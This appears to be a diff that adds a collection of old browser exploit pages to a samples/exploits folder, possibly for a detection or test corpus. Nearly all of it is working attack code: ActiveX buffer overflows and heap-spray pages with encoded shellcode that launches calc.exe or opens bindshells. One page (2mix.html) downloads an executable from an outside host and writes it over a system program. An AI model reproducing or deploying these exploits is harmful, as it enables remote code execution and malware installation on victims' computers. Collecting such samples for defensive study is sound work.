AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA^Êÿ|ëYëèøÿÿÿIIIIIIIIIIIIIIIIIQZ7jJXP0B1ABkBAZB2BA2AA0AAX8BBPuzIYlm81T7pePUPLKG55lLKQlC5RXs1jOLKBoUHnkaOQ0TAzKsyLKUdNkwqZN4qiPLYnLK4o044VgjajjFmdAO2ZKl4Uk1D4dFd0uKUNkaOEtEQzKpfnkvlbkNkSo5LuQjKNkeLnkVaXkk9QLDdc4iS7AIPu4nkQPDpk5YPrXdLNkaPflNkPpELnMLKCXwxjKEYlKmPLpS0S0uPLK3XElcofQHvu0QFlIL8ncO0akRpbHXoxNm0u0bHNxinNjDNpWkOKWU3rAPl0cFNCUT8e5C0J")
+
+</script>
+</html>
+</body>
+
+
28 samples/exploits/22811_Elazar.html
@@ -0,0 +1,28 @@
+<!--
+written by e.b.
+-->
+<html>
+ <head>
+ <script language="JavaScript" DEFER>
+ function Check() {
+ var s = "AAAA";
+
+ while (s.length < 999999) s=s+s;
+
+ var obj = new ActiveXObject("IERPCTL.IERPCTL"); //{FDC7A535-4070-4B92-A0EA-D9994BCC0DC5}
+
+
+ obj.Import(s);
+ obj.PlayerProperty(s);
+
+
+ }
+ </script>
+
+ </head>
+ <body onload="JavaScript: return Check();">
+
+ </body>
+</html>
+
+
67 samples/exploits/2448.html
@@ -0,0 +1,67 @@
+<!--
+
+..::[ jamikazu presents ]::..
+
+Microsoft Internet Explorer WebViewFolderIcon (setSlice) Exploit (0day)
+Works on all Windows XP versions including SP2
+
+Author: jamikazu
+Mail: jamikazu@gmail.com
+
+Bug discovered by Computer H D Moore (http://www.metasploit.com)
+
+Credit: metasploit, SkyLined
+
+invokes calc.exe if successful
+
+-->
+
+<HTML>
+<BODY>
+<SCRIPT language="javascript">
+
+ var heapSprayToAddress = 0x05050505;
+ var payLoadCode = unescape(
+ "%u9090%u9090%uE8FC%u0044%u0000%u458B%u8B3C%u057C%u0178%u8BEF%u184F%u5F8B%u0120" +
+ "%u49EB%u348B%u018B%u31EE%u99C0%u84AC%u74C0%uC107%u0DCA%uC201%uF4EB%u543B%u0424" +
+ "%uE575%u5F8B%u0124%u66EB%u0C8B%u8B4B%u1C5F%uEB01%u1C8B%u018B%u89EB%u245C%uC304" +
+ "%uC031%u8B64%u3040%uC085%u0C78%u408B%u8B0C%u1C70%u8BAD%u0868%u09EB%u808B%u00B0" +
+ "%u0000%u688B%u5F3C%uF631%u5660%uF889%uC083%u507B%uF068%u048A%u685F%uFE98%u0E8A" +
+ "%uFF57%u63E7%u6C61%u0063");
+ var heapBlockSize = 0x400000;
+ var payLoadSize = payLoadCode.length * 2;
+ var spraySlideSize = heapBlockSize - (payLoadSize+0x38);
+ var spraySlide = unescape("%u0505%u0505");
+ spraySlide = getSpraySlide(spraySlide,spraySlideSize);
+ heapBlocks = (heapSprayToAddress - 0x400000)/heapBlockSize;
+ memory = new Array();
+
+ for (i=0;i<heapBlocks;i++)
+ {
+ memory[i] = spraySlide + payLoadCode;
+ }
+
+ for ( i = 0 ; i < 128 ; i++)
+ {
+ try{
+ var tar = new ActiveXObject('WebViewFolderIcon.WebViewFolderIcon.1');
+ tar.setSlice(0x7ffffffe, 0x05050505, 0x05050505,0x05050505 );
+ }catch(e){}
+ }
+
+ function getSpraySlide(spraySlide, spraySlideSize)
+ {
+ while (spraySlide.length*2<spraySlideSize)
+ {
+ spraySlide += spraySlide;
+ }
+ spraySlide = spraySlide.substring(0,spraySlideSize/2);
+ return spraySlide;
+ }
+
+</SCRIPT>
+
+</BODY>
+</HTML>
+
+
47 samples/exploits/2575.html
@@ -0,0 +1,47 @@
+<script type="text/jscript">function init() { document.write("");}window.onload = init;</script>
+
+<SCRIPT language="JavaScript">
+var expires = new Date();
+expires.setTime(expires.getTime() + 24 * 60 * 60 * 1000);
+var set_cookie = document.cookie.indexOf("3Ware=");
+if (set_cookie == -1){document.cookie = "3Ware=1;expires=" + expires.toGMTString();
+document.write('<object id="gl" classid="clsid:F3E70CEA-956E-49CC-B444-73AFE593AD7F"></object>');
+var helloworld2Address = 0x0c0c0c0c;
+var shellcode = unescape("%u10eb%u4b5b%uc933%ub966%u029b%u3480%ufe0b%ufae2%u05eb%uebe8%uffff%u17ff%ufcc4%ufefe%u94a1%ua7ce%u759a%u75ff%uf2be%u8e75%u53e2%u9675%u75f6%u9409%ua7f9%u2416%ufeff%u1cfe%ube07%uc67e%u8b3d%u7704%udab8%u9196%ufe90%u96fe%u8c8b%u9392%u94aa%ua7ff%uf875%u5e16%ufeff%u6bfe%u4a16%ufeff%u73fe%uc940%ufeff%ua9fe%u0196%ufefe%u01fe%ufaa8%u39fd%ufe39%u80a2%ud080%ube39%u9bfa%u9b86%ua9fe%ua801%ucdf6%uad25%ua9ad%ub873%uaec6%u01ad%ue2a8%u9294%u9096%u9a8a%uaa92%uff94%u75a7%u16f8%uffa7%ufefe%u1675%ubefd%u75c2%ue2b6%u8675%ufdd2%u9a03%ueb75%ufece%ufefe%u6c75%ufe56%ufefe%u0f96%udbb3%u962b%ub30f%u2bdb%u3796%ua0ac%u01ad%u6aca%ub871%u39d6%ud2b8%u7fb3%uefce%u4696%ufecc%u96fe%uce46%ufefe%u4696%ufed7%u75fe%u6afa%ub99e%uf9c7%ufc8a%u071c%u8077%u9fce%u4696%uffe1%u96fe%ueb46%ufeff%u4696%ufe0e%u75fe%u6afa%uc7b9%u8af9%u1cfc%u7707%uca80%ufe94%u9b96%ucd92%u96cc%u9b95%u908c%u94aa%ua7ff%uf875%u2c16%ufefe%u75fe%ufd26%uc2be%u3e7d%u75e6%u9686%u05fd%u817d%ufeee%u8b8a%ub175%ufdf2%u7f35%u90c7%u9a8a%u8b92%u759d%ufdd1%u7d15%ufe83%u8afe%u75a7%ufebb%uba73%ufce6%u37cd%u40f1%uc4ee%u8a28%u3ff6%uf937%u34fd%u15be%uc50f%ud6b0%ue48b%ud59e%ufdd1%uee91%uaaae%ufa94%ufa94%u01ab%ue6a8%u01a6%uce88%ubb71%u9ffe%ue315%ub0c5%u8bd2%u9ee6%ud1d5%u91fd%uaeee%u94aa%u94fa%uabfa%ua801%ua6e6%u8801%u71ca%ufebb%u7d9f%ufa3b%u5f15%u397d%u15ea%u757b%uea80%u94aa%u94fa%ua981%ua801%u39e6%u96f9%uf4f6%ucdfe%u763e%ufab9%u0275%uec94%u55a7%u031c%u3998%udaba%uffc2%u75ff%u7302%ueeb9%uaea9%uafaf%uafaf%uafaf%u73af%uc978%ufeff%uaefe%ua801%u7ff2%u763a%ufeff%u3cfe%ufede%ua801%u75ee%udaa8%ua5bf%ufdac%ufd1f%ufd1f%ufd1f%u7d1f%ufa12%uada4%u2475%u091c%u01ac%uaf1e%u75a8%uc28b%u8a75%u86d0%u0bfd%u75a8%ude88%u0bfd%u37cd%ubfb7%ufd53%ucd3b%uf125%uee40%u28c4%uf68a%u353f%ufdf9%ube24%u0f15%ue1c5%u198b%u75a0%udaa0%u23fd%u7598%ub5f2%ua075%ufde2%u7523%u75fa%u3bfd%ua055%u3da7%u3f16%u0103%ucc01%u6f8a%uc7f2%u831c%u877d%u18c7%u3766%u5842%u9d95%u2f77%u0eb1%u85b6%ue0c3%u9a5a%u7e11%u5128%ub364%uce7f%ufeef%ufefe%ufefe%ufefe%ufefe%ufefe%ufefe%ufefe%ufefe%ufefe%u96fe%u8a8a%uc48e%ud1d1%u8989%ud089%ucd89%ud39d%u8c91%ud099%u919d%ud193%ucd89%ud09d%u869b%ufe9b");
+var hbshelloworld = 0x100000;
+var payLoadSize = shellcode.length * 2;
+var spraySlideSize = hbshelloworld - (payLoadSize+0x38);
+var spraySlide = unescape("%u0c0c%u0c0c");
+
+function getSpraySlide(spraySlide, spraySlideSize) {
+ while (spraySlide.length*2<spraySlideSize) {
+ spraySlide += spraySlide;
+ }
+ spraySlide = spraySlide.substring(0,spraySlideSize/2);
+ return spraySlide;
+}
+
+
+spraySlide = getSpraySlide(spraySlide,spraySlideSize);
+heapBlocks = (helloworld2Address - 0x100000)/hbshelloworld;
+memory = new Array();
+for (i=0;i<heapBlocks;i++) {
+ memory[i] = spraySlide + shellcode;
+}
+
+
+var size_buff = 1070;
+var x = unescape("%0c%0c%0c%0c");
+while (x.length<size_buff) x += x;
+gl.FlvPlayerUrl = x;
+}
+
+</SCRIPT>
+<script>
+if (set_cookie == -1){
+location.reload();
+}
+</script>
+
+
+//Sebug.net
47 samples/exploits/2mix.html
@@ -0,0 +1,47 @@
+<SCRIPT language="javascript">
+ var p_url = "http://paksusic.cn/nuc/exe.php";
+function SS()
+{
+try{
+ret=new ActiveXObject("snpvw.Snapshot Viewer Control.1");
+var arbitrary_file = p_url;
+var dest = 'C:/Program Files/Outlook Express/wab.exe';
+document.write("<object classid='clsid:F0E42D60-368C-11D0-AD81-00A0C90DC8D9' id='attack'></object>");
+attack.SnapshotPath = arbitrary_file;
+setTimeout('window.location = "ldap://127.0.0.1"',2000);
+attack.CompressedPath = dest;
+attack.PrintSnapshot(arbitrary_file,dest);
+}catch(e){}
+}
+function WML()
+{
+document.write('<div id="replace">x</div>');
+var srtkod = unescape("%u4343%u4343%u0feb%u335b%u66c9%u80b9%u8001%uef33" +
+"%ue243%uebfa%ue805%uffec%uffff%u8b7f%udf4e%uefef%u64ef%ue3af%u9f64%u42f3%u9f64%u6ee7%uef03%uefeb" +
+"%u64ef%ub903%u6187%ue1a1%u0703%uef11%uefef%uaa66%ub9eb%u7787%u6511%u07e1%uef1f%uefef%uaa66%ub9e7" +
+"%uca87%u105f%u072d%uef0d%uefef%uaa66%ub9e3%u0087%u0f21%u078f%uef3b%uefef%uaa66%ub9ff%u2e87%u0a96" +
+"%u0757%uef29%uefef%uaa66%uaffb%ud76f%u9a2c%u6615%uf7aa%ue806%uefee%ub1ef%u9a66%u64cb%uebaa%uee85" +
+"%u64b6%uf7ba%u07b9%uef64%uefef%u87bf%uf5d9%u9fc0%u7807%uefef%u66ef%uf3aa%u2a64%u2f6c%u66bf%ucfaa" +
+"%u1087%uefef%ubfef%uaa64%u85fb%ub6ed%uba64%u07f7%uef8e%uefef%uaaec%u28cf%ub3ef%uc191%u288a%uebaf" +
+"%u8a97%uefef%u9a10%u64cf%ue3aa%uee85%u64b6%uf7ba%uaf07%uefef%u85ef%ub7e8%uaaec%udccb%ubc34%u10bc" +
+"%ucf9a%ubcbf%uaa64%u85f3%ub6ea%uba64%u07f7%uefcc%uefef%uef85%u9a10%u64cf%ue7aa%ued85%u64b6%uf7ba" +
+"%uff07%uefef%u85ef%u6410%uffaa%uee85%u64b6%uf7ba%uef07%uefef%uaeef%ubdb4%u0eec%u0eec%u0eec%u0eec" +
+"%u036c%ub5eb%u64bc%u0d35%ubd18%u0f10%u64ba%u6403%ue792%ub264%ub9e3%u9c64%u64d3%uf19b%uec97%ub91c" +
+"%u9964%ueccf%udc1c%ua626%u42ae%u2cec%udcb9%ue019%uff51%u1dd5%ue79b%u212e%uece2%uaf1d%u1e04%u11d4" +
+"%u9ab1%ub50a%u0464%ub564%ueccb%u8932%ue364%u64a4%uf3b5%u32ec%ueb64%uec64%ub12a%u2db2%uefe7%u1b07" +
+"%u1011%uba10%ua3bd%ua0a2%uefa1%u7468%u7074%u2F3A%u702F%u6B61%u7573%u6973%u2E63%u6E63%u6E2F%u6375%u652F%u6578%u702E%u7068");
+var psrayt = unescape("%u0a0a%u0a0a");
+do {
+ psrayt += psrayt;
+} while(psrayt.length < 0xd0000);
+meray = new Array();
+for(i = 0; i < 100; i++)
+ meray[i] = psrayt + srtkod;
+xmlcode = "<XML ID=I><X><C><![CDATA[<image SRC=http://&#x0a0a;&#x0a0a;.example.com>]]></C></X></XML><SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML><XML ID=I></XML><SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN></SPAN>";
+tag = document.getElementById("replace");
+tag.innerHTML = xmlcode;
+}
+
+if (WML()||SS()) { }
+</script>
+
38 samples/exploits/3420.html
@@ -0,0 +1,38 @@
+<!--
+prdelka
+http://blogs.23.nu/prdelka
+
+I made a version of my winzip exploit that utilises the heap spray
+method with a bindshell for some project or other. you can download a
+copy here if its of use to you, note i used a different method courtesy
+of http://www.milw0rm.com/exploits/3055 - however i couldnt get their
+exploit to function. enjoy.
+-->
+
+<HTML>
+<HEAD>
+<meta http-equiv="refresh" content="0">
+<TITLE></TITLE>
+</HEAD>
+<BODY>
+<OBJECT ID="WZFILEVIEW" WIDTH=50 HEIGHT=50 CLASSID="clsid:A09AE68F-B14D-43ED-B713-BA413F034904"></OBJECT>
+<script type="text/javascript">
+shellcode = unescape("%u4343%u4343%u43eb%u5756%u458b%u8b3c%u0554%u0178%u52ea%u528b%u0120%u31ea%u31c0%u41c9%u348b%u018a%u31ee%uc1ff%u13cf%u01ac%u85c7%u75c0%u39f6%u75df%u5aea%u5a8b%u0124%u66eb%u0c8b%u8b4b%u1c5a%ueb01%u048b%u018b%u5fe8%uff5e%ufce0%uc031%u8b64%u3040%u408b%u8b0c%u1c70%u8bad%u0868%uc031%ub866%u6c6c%u6850%u3233%u642e%u7768%u3273%u545f%u71bb%ue8a7%ue8fe%uff90%uffff%uef89%uc589%uc481%ufe70%uffff%u3154%ufec0%u40c4%ubb50%u7d22%u7dab%u75e8%uffff%u31ff%u50c0%u5050%u4050%u4050%ubb50%u55a6%u7934%u61e8%uffff%u89ff%u31c6%u50c0%u3550%u0102%ucc70%uccfe%u8950%u50e0%u106a%u5650%u81bb%u2cb4%ue8be%uff42%uffff%uc031%u5650%ud3bb%u58fa%ue89b%uff34%uffff%u6058%u106a%u5054%ubb56%uf347%uc656%u23e8%uffff%u89ff%u31c6%u53db%u2e68%u6d63%u8964%u41e1%udb31%u5656%u5356%u3153%ufec0%u40c4%u5350%u5353%u5353%u5353%u5353%u6a53%u8944%u53e0%u5353%u5453%u5350%u5353%u5343%u534b%u5153%u8753%ubbfd%ud021%ud005%udfe8%ufffe%u5bff%uc031%u5048%ubb53%ucb43%u5f8d%ucfe8%ufffe%u56ff%uef87%u12bb%u6d6b%ue8d0%ufec2%uffff%uc483%u615c%u89eb");
+//bindshell port 28876
+bigblock = unescape("%u9090%u9090");
+headersize = 20;
+slackspace = headersize+shellcode.length
+while (bigblock.length<slackspace) bigblock+=bigblock;
+fillblock = bigblock.substring(0, slackspace);
+block = bigblock.substring(0, bigblock.length-slackspace);
+while(block.length+slackspace<0x40000) block = block+block+fillblock;
+memory = new Array();
+for (i=0;i<900;i++) memory[i] = block + shellcode;
+var buf = 'A';
+while (buf.length < 512) buf+='\x09';
+WZFILEVIEW.CreateNewFolderFromName(buf);
+</SCRIPT>
+</BODY>
+</HTML>
+
+# milw0rm.com [2007-03-06]
BIN samples/exploits/36488084.sc
Binary file not shown.
BIN samples/exploits/39973780.sc
Binary file not shown.
44 samples/exploits/4042.html
@@ -0,0 +1,44 @@
+<html>
+<!--
+45 minutes of fuzzing!
+Great results! very relible, runs calc.exe, replace with shellcode of your choice!!!
+
+link:http://www.informationweek.com/news/showArticle.jhtml?articleID=199901856
+maybe more vulz!
+
+Greetz to: str0ke and shinnai!
+-->
+<html>
+<object classid='clsid:DCE2F8B1-A520-11D4-8FD0-00D0B7730277' id='target'></object>
+<script>
+shellcode = unescape("%u9090%u9090%u9090%uC929%uE983%uD9DB%uD9EE%u2474" +
+"%u5BF4%u7381%uA913%u4A67%u83CC%uFCEB%uF4E2%u8F55" +
+"%uCC0C%u67A9%u89C1%uEC95%uC936%u66D1%u47A5%u7FE6" +
+"%u93C1%u6689%u2FA1%u2E87%uF8C1%u6622%uFDA4%uFE69" +
+"%u48E6%u1369%u0D4D%u6A63%u0E4B%u9342%u9871%u638D" +
+"%u2F3F%u3822%uCD6E%u0142%uC0C1%uECE2%uD015%u8CA8" +
+"%uD0C1%u6622%u45A1%u43F5%u0F4E%uA798%u472E%u57E9" +
+"%u0CCF%u68D1%u8CC1%uECA5%uD03A%uEC04%uC422%u6C40" +
+"%uCC4A%uECA9%uF80A%u1BAC%uCC4A%uECA9%uF022%u56F6" +
+"%uACBC%u8CFF%uA447%uBFD7%uBFA8%uFFC1%u46B4%u30A7" +
+"%u2BB5%u8941%u33B5%u0456%uA02B%u49CA%uB42F%u67CC" +
+"%uCC4A%uD0FF");
+bigblock = unescape("%u9090%u9090");
+headersize = 20;
+slackspace = headersize+shellcode.length
+while (bigblock.length<slackspace) bigblock+=bigblock;
+fillblock = bigblock.substring(0, slackspace);
+block = bigblock.substring(0, bigblock.length-slackspace);
+while(block.length+slackspace<0x40000) block = block+block+fillblock;
+memory = new Array();
+for (x=0; x<800; x++) memory[x] = block + shellcode;
+var buffer = '\x0a';
+while (buffer.length < 5000) buffer+='\x0a\x0a\x0a\x0a';
+target.server = buffer;
+target.initialize();
+target.send();
+</script>
+</html>
+sometimes 0a0a0a0a0a is not as good as 0d0d0d0d or 11111111
+
+# milw0rm.com [2007-06-07]
32 samples/exploits/4043.html
@@ -0,0 +1,32 @@
+<html>
+<object classid='clsid:9D39223E-AE8E-11D4-8FD3-00D0B7730277' id='target'></object>
+<script>
+shellcode = unescape("%u9090%u9090%u9090%uC929%uE983%uD9DB%uD9EE%u2474" +
+"%u5BF4%u7381%uA913%u4A67%u83CC%uFCEB%uF4E2%u8F55" +
+"%uCC0C%u67A9%u89C1%uEC95%uC936%u66D1%u47A5%u7FE6" +
+"%u93C1%u6689%u2FA1%u2E87%uF8C1%u6622%uFDA4%uFE69" +
+"%u48E6%u1369%u0D4D%u6A63%u0E4B%u9342%u9871%u638D" +
+"%u2F3F%u3822%uCD6E%u0142%uC0C1%uECE2%uD015%u8CA8" +
+"%uD0C1%u6622%u45A1%u43F5%u0F4E%uA798%u472E%u57E9" +
+"%u0CCF%u68D1%u8CC1%uECA5%uD03A%uEC04%uC422%u6C40" +
+"%uCC4A%uECA9%uF80A%u1BAC%uCC4A%uECA9%uF022%u56F6" +
+"%uACBC%u8CFF%uA447%uBFD7%uBFA8%uFFC1%u46B4%u30A7" +
+"%u2BB5%u8941%u33B5%u0456%uA02B%u49CA%uB42F%u67CC" +
+"%uCC4A%uD0FF");
+bigblock = unescape("%u9090%u9090");
+headersize = 20;
+slackspace = headersize+shellcode.length
+while (bigblock.length<slackspace) bigblock+=bigblock;
+fillblock = bigblock.substring(0, slackspace);
+block = bigblock.substring(0, bigblock.length-slackspace);
+while(block.length+slackspace<0x40000) block = block+block+fillblock;
+memory = new Array();
+for (x=0; x<800; x++) memory[x] = block + shellcode;
+var buffer = '\x0a';
+while (buffer.length < 5000) buffer+='\x0a\x0a\x0a\x0a';
+target.server = buffer;
+target.receive();
+</script>
+</html>
+
+# milw0rm.com [2007-06-07]
24 samples/exploits/4148.html
@@ -0,0 +1,24 @@
+<HTML>
+<HEAD>
+<META http-equiv=Content-Type content="text/html; charset=windows-1252">
+<SCRIPT type=text/javascript>
+
+function init()
+{
+var foo = "";
+
+for(var icount = 0; icount < 1060; icount++)
+{
+foo = foo + "x";
+}
+var ngssoftware;
+ngssoftware = new ActiveXObject("kweditcontrol.kwedit.1");
+
+ngssoftware["PrepareToPostHTML"](foo);
+}
+//-->
+</SCRIPT>
+
+</HEAD>
+<BODY bgColor=#ffffff onload=init()>
+</BODY></HTML>
76 samples/exploits/4149.html
@@ -0,0 +1,76 @@
+<!--
+=======
+Summary
+=======
+Name: EnjoySAP, SAP GUI for Windows - Heap Overflow
+Release Date: 5 July 2007
+Reference: NGS00482
+Discover: Mark Litchfield <mark@ngssoftware.com>
+Vendor: SAP
+Vendor Reference: SECRES-290
+Systems Affected: All ASCII Versions
+Risk: High
+Status: Fixed
+
+========
+TimeLine
+========
+Discovered: 4 January 2007
+Released: 19 January 2007
+Approved: 29 January 2007
+Reported: 12 January 2007
+Fixed: 27 March 2007
+Published:
+
+===========
+Description
+===========
+EnjoySAP, also know as Enjoy is the most popular SAP GUI used today. The
+latest version can be obtained from ftp://ftp.sap.com/pub/sapgui/win/
+
+When installing EnjoySAP, in appreciation of its vast size for being a
+client (around 500MB), there are an astounding 1102 ActiveX controls
+installed.
+
+A relatively brief examinaton of these controls, found a large number of
+instances that would terminate EnjoySAP process, there were a number that
+could create files on the file system (there unfortunately exists no
+ability to inject content into these created files) and a number of
+bufferoverruns.
+
+=================
+Technical Details
+=================
+Control - rfcguisink.rfcguisink.1
+
+Function - LaunchGui
+
+POC:
+-->
+
+<HTML>
+<HEAD>
+<META http-equiv=Content-Type content="text/html; charset=windows-1252">
+<SCRIPT type=text/javascript>
+
+function init()
+{
+var foo = "";
+
+for(var icount = 0; icount < 1800; icount++)
+{
+ foo = foo + "x";
+}
+var ngssoftware;
+ngssoftware = new ActiveXObject("rfcguisink.rfcguisink.1");
+
+ngssoftware["LaunchGui"](foo, 1, 1);
+}
+//-->
+</SCRIPT>
+
+</HEAD>
+<BODY bgColor=#ffffff onload=init()>
+</BODY></HTML>
+
+# milw0rm.com [2007-07-05]
131 samples/exploits/4158.html
@@ -0,0 +1,131 @@
+<!--
+/* PUBLIC SINCE MAY 31th 2007 */
+
+/**** PRIVATE *** DON'T DISTRIBUTE *** PRIVATE *** DON'T DISTRIBUTE *** PRIVATE ****/
+____________________________________________________________________________
+NeoTracePro 3.25 ActiveX Control "TraceTarget()" b0f [NeoTraceExplorer.dll]
+Remote 0-day Exploit
+Risk Level: High
+Impact: Remote command execution
+Author: A. Alejandro Hernandez aka nitr0us <nitrousenador@gmail.com>
+Date: 24/03/07
+Mexico
+____________________________________________________________________________
+/**** PRIVATE *** DON'T DISTRIBUTE *** PRIVATE *** DON'T DISTRIBUTE *** PRIVATE ****/
+
+I found this buffer overflow fuzzing NeoTraceExplorer.dll (an ActiveX Control) with ComRaider from iDefense.
+It has a method called TraceTarget() which can be exploited passing a large string (~486 bytes) due there's no boundary checking.
+
+Unfortunately, somebody else found this vulnerability few months ago, but this person didn't release an exploit ;)
+just published an advisory ( http://secunia.com/advisories/23463).
+
+First of all, this b0f cannot be exploitable with the classic technique (EIP points to an address that has a 'jmp esp') because
+each byte of the ret address MUST BE between 0x00 and 0x7f (ascii values), in other case, InternetExplorer will change
+the out-of-range bytes to 0x3f ('?' character) and EIP will point to and invalid address.
+Example:
+I've an 'jmp esp' @ 0x7c951eed in ntdll.dll, if I set the ret address to 0x7c951eed, when the buffer gets passed from
+Internet Explorer to TraceTarget(), it will overwrite EIP with: 0x7c3f1e3f (bullshit!).
+
+So, The Skylined's Heap Spraying technique comes into my mind... and here is, working so fuckin' fine =).
+
+TESTED ON: Windows XP SP 2 (Spanish) + Internet Explorer 7.0.5730.11 + NeoTracePro 3.25
+
+Greetz to: Crypkey, alt3kx, zonartm.org, dex, Optix, Nahual, ran.
+-->
+
+<html>
+ <head>
+ <title>
+ NeoTracePro 3.25 ActiveX Control "TraceTarget()" b0f [NeoTraceExplorer.dll] Remote 0-day Exploit
+ </title>
+ </head>
+
+ <body bgcolor=black text=white link=white alink=white vlink=white>
+ <center>
+
+ <object classid="clsid:3E1DD897-F300-486C-BEAF-711183773554" id="NeoTracePro"></object>
+
+ <b>/**** PRIVATE *** DON'T DISTRIBUTE *** PRIVATE *** DON'T DISTRIBUTE *** PRIVATE ****/</b><br><br>
+ NeoTracePro 3.25 ActiveX Control "TraceTarget()" b0f [NeoTraceExplorer.dll] Remote 0-day Exploit<br>
+ by <a href="mailto:nitrousenador@gmail.com">nitr0us</a><br>
+ <a href="http://www.genexx.org/nitrous/" target=_blank>www.genexx.org/nitrous/</a><br><br>
+
+ <input type="button" value="Exploit!" onClick="exploit()">
+
+ <script>
+ function exploit(){
+ var Target = ""; // Exploit string
+ var PwnEIP = 486; // bytes to reach EIP
+ var Ninja = "\x05\x05\x05\x05"; // ret address = 0x05050505
+ /* The fscking shellc0de, bind port 64876 [nitro ;)], encoded with Skylined's Alpha2 encoder and finally converted to utf-16 */
+ // $./msfpayload win32_bind LPORT=64876 R | ./msfencode -t raw -b '\x00' -e Alpha2 | ./beta --utf-16 > shellcode.txt
+ // beta encoder src: http://www.edup.tudelft.nl/~bjwever/src/beta.c
+ var ShellCode = unescape(
+ "%u03eb%ueb59%ue805%ufff8%uffff%u4949%u4937%u4949%u4949%u4949%u4949%u4949%u4949%u4949" +
+ "%u5a51%u626a%u3058%u3042%u4150%u416b%u7241%u4132%u4142%u3242%u4142%u4230%u5841%u4138" +
+ "%u5042%u7a75%u6b49%u434c%u585a%u726b%u4d6d%u5938%u4969%u496f%u696f%u516f%u4c70%u324b" +
+ "%u444c%u4164%u4e34%u476b%u4735%u4e4c%u636b%u744c%u3245%u5358%u5a31%u4c4f%u724b%u756f" +
+ "%u6e48%u536b%u576f%u3650%u4861%u636b%u4e79%u706b%u6c34%u644b%u6a41%u544e%u4f71%u4f30" +
+ "%u6e69%u6b4c%u4f34%u5130%u4464%u5a47%u3961%u545a%u444d%u6f41%u4a32%u494b%u6564%u426b" +
+ "%u6474%u7164%u6138%u5a65%u6e45%u636b%u656f%u6574%u7851%u556b%u6c36%u664b%u506c%u4c4b" +
+ "%u514b%u474f%u456c%u7851%u776b%u5473%u6e6c%u4e6b%u7269%u614c%u5734%u426c%u4f41%u4633" +
+ "%u4b51%u316b%u4c74%u714b%u5053%u4c30%u614b%u6650%u6c6c%u344b%u3730%u4c6c%u4c6d%u474b" +
+ "%u6730%u4178%u734e%u6e58%u326e%u766e%u5a6e%u764c%u4b30%u484f%u4256%u7246%u7573%u4336" +
+ "%u3458%u7473%u4272%u5448%u3237%u3453%u7372%u426f%u6b74%u7a4f%u7070%u5868%u584b%u4b6d" +
+ "%u774c%u304b%u4b50%u5a4f%u5376%u6d6f%u4b59%u6355%u4f56%u6a71%u534d%u3438%u6642%u7235" +
+ "%u444a%u3942%u386f%u5050%u6e68%u6439%u4b49%u6e45%u304d%u4b57%u494f%u5346%u3063%u6353" +
+ "%u3663%u5333%u3163%u5153%u3043%u3343%u4b63%u4a4f%u5070%u7166%u4978%u526d%u434c%u5656" +
+ "%u4c33%u4d49%u6e31%u5075%u4c68%u3464%u505a%u6f70%u4637%u3937%u4e6f%u7036%u746a%u4350" +
+ "%u7661%u7935%u586f%u6150%u6d78%u4e74%u764d%u6d4e%u5239%u7977%u4e6f%u3336%u3363%u4965" +
+ "%u4a6f%u5370%u4958%u3775%u4e39%u7066%u4649%u4b37%u4e4f%u6636%u7630%u6634%u6634%u6935" +
+ "%u486f%u7a50%u4233%u3948%u7077%u7879%u3146%u5069%u3957%u6b6f%u5366%u6965%u686f%u6550" +
+ "%u7336%u655a%u7034%u3166%u5178%u7273%u6f4d%u6d79%u3135%u427a%u6670%u4139%u5839%u6e4c" +
+ "%u4869%u7367%u735a%u6e74%u6a69%u3742%u3941%u3850%u6c73%u4b6a%u774e%u4432%u4b6d%u474e" +
+ "%u6432%u6d6c%u6e43%u706d%u307a%u6c38%u6c6b%u4e6b%u634b%u7058%u4b72%u4e4e%u5653%u4b76" +
+ "%u4869%u7367%u735a%u6e74%u6a69%u3742%u3941%u3850%u6c73%u4b6a%u774e%u4432%u4b6d%u474e" +
+ "%u6432%u6d6c%u6e43%u706d%u307a%u6c38%u6c6b%u4e6b%u634b%u7058%u4b72%u4e4e%u5653%u4b76" +
+ "%u424f%u3055%u5944%u796f%u6346%u706b%u7257%u7272%u4671%u5031%u3251%u644a%u7041%u3251" +
+ "%u4171%u4645%u3931%u6a6f%u6370%u4c58%u6e6d%u5739%u5875%u434e%u4963%u6b6f%u5166%u4b7a" +
+ "%u6b4f%u754f%u6967%u686f%u4e50%u366b%u3937%u4c6c%u3843%u5044%u4964%u5a6f%u4676%u4932" +
+ "%u7a6f%u7570%u6c38%u6e30%u456a%u7154%u464f%u6b33%u4e4f%u6b36%u6e4f%u6230");
+ var heapSprayToAddress = 0x05050505; // Spray up to this address
+ var heapBlockSize = 0x400000; // Size of the blocks we want to create
+ var heapHdrSize = 0x38; // The size of the header of heap blocks in MSIE
+ var payLoadSize = ShellCode.length * 2; // Size of the shellcode (convert dwords to bytes)
+ var spraySlideSize = heapBlockSize - (payLoadSize + heapHdrSize); // Size of the nopslide
+ var spraySlide = unescape("%u4141%u4141"); // NOP Slide filled with 0x41 ( inc ecx)
